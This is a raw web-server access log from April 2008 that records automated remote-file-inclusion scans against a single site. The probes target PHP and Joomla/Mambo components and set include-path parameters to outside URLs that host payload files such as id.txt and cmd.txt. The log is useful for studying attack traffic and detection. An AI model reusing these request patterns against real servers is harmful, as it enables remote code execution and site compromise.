87.106.184.203 - - [23/Apr/2008:10:55:13 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:10:55:15 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:10:55:17 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://forsalebyowner.com.au/adpics/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
63.243.44.3 - - [23/Apr/2008:10:55:18 -0700] "GET /logs/access_071227.log/index.php?option=com_admin=add&Itemid=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [23/Apr/2008:10:55:18 -0700] "GET /logs/index.php?option=com_admin=add&Itemid=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [23/Apr/2008:10:56:07 -0700] "GET /logs/access_080204.log/index.php?option=com_admin=add&Itemid=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:56:12 -0700] "GET /logs/access_080309.log/?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:56:37 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:56:38 -0700] "GET //config.inc.php?path_escape=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:56:38 -0700] "GET /logs//config.inc.php?path_escape=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:10:57:20 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:10:57:22 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:10:57:29 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:10:57:29 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:10:57:29 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:10:58:02 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:10:58:06 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:58:11 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:10:58:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:58:32 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:58:40 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:59:33 -0700] "GET /logs/access_080131.log/scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:59:33 -0700] "GET /scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:59:33 -0700] "GET /logs/scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:59:42 -0700] "GET /logs/access_080127.log/scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:00:03 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:00:03 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:00:04 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:00:08 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:00:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:00:09 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.118.170.87 - - [23/Apr/2008:11:00:13 -0700] "GET /logs/access_071224.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:11:00:24 -0700] "GET /logs/access_080131.log/scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:11:00:24 -0700] "GET /scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:11:00:25 -0700] "GET /logs/scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:11:00:34 -0700] "GET /logs/access_080127.log/scanhttp://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:00:41 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.97.247.5 - - [23/Apr/2008:11:01:04 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
217.97.247.5 - - [23/Apr/2008:11:01:04 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:01:11 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.230.7.194 - - [23/Apr/2008:11:01:17 -0700] "GET /logs/access_071225.log/!scanhttp://www.cyos.co.kr/bbs/data1/comment?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:11:02:29 -0700] "GET /logs/access.log/index.php?Sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:11:02:32 -0700] "GET /index.php?Sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:11:02:32 -0700] "GET /logs/index.php?Sayfa=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.195.123.29 - - [23/Apr/2008:11:03:19 -0700] "GET /logs/classes/core/language.php?rootdir=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
193.200.150.23 - - [23/Apr/2008:11:03:20 -0700] "GET /classes/core/language.php?rootdir=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:03:32 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:03:47 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:11:03:48 -0700] "GET /logs/access_080223.log/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:11:03:48 -0700] "GET /logs/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:11:04:01 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:11:04:16 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.123.207.130 - - [23/Apr/2008:11:04:19 -0700] "GET /logs/access_080308.log//init_basic.php?GALLERY_BASEDIR=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:11:04:29 -0700] "GET /logs/access_080324.log/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:11:04:29 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:11:04:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.184.203 - - [23/Apr/2008:11:04:45 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.34 - - [23/Apr/2008:11:05:34 -0700] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:11:05:47 -0700] "GET /logs/access_080218.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.212.173.42 - - [23/Apr/2008:11:05:49 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://albaworld.extra.hu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:11:06:00 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:11:06:00 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:11:06:00 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:11:06:16 -0700] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
204.15.10.144 - - [23/Apr/2008:11:06:16 -0700] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.gibleder04.de/images/zoom/OLTAXH/viewsize/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:11:06:41 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:06:59 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:07:05 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.114.53.153 - - [23/Apr/2008:11:07:16 -0700] "GET /logs/access_071219.log//index.php?option=com_simple=§ionid=&id=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:07:53 -0700] "GET /logs/access_080308.log/index.php?redir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:07:54 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:07:55 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:07:55 -0700] "GET /index.php?redir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:07:56 -0700] "GET /logs/index.php?redir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:08:11 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:08:11 -0700] "GET /errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:08:11 -0700] "GET /logs/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:08:20 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:08:33 -0700] "GET /logs/access_080215.log/index.php?redir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.153.55.177 - - [23/Apr/2008:11:08:38 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:08:46 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:09:12 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:09:12 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:09:12 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:11:10:08 -0700] "GET //account.php?action=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:11:10:45 -0700] "GET /logs/access_080215.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:11:10:45 -0700] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:11:10:46 -0700] "GET /logs/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:10:50 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.121.92 - - [23/Apr/2008:11:10:50 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:11:04 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:11:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:11:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:17 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:17 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:17 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.130.70 - - [23/Apr/2008:11:11:23 -0700] "GET /index.php?redir=http://demoner0x.altervista.org/L4M3R/safeon.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:11:11:28 -0700] "GET /logs/access.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:41 -0700] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:41 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:41 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:43 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:58 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:58 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.26.101.32 - - [23/Apr/2008:11:11:58 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:11:12:02 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:11:12:47 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.zinforma.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:11:12:47 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.zinforma.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:11:12:48 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.zinforma.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:11:13:03 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://www.zinforma.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:13:19 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:13:20 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:11:13:20 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:30 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:13:30 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
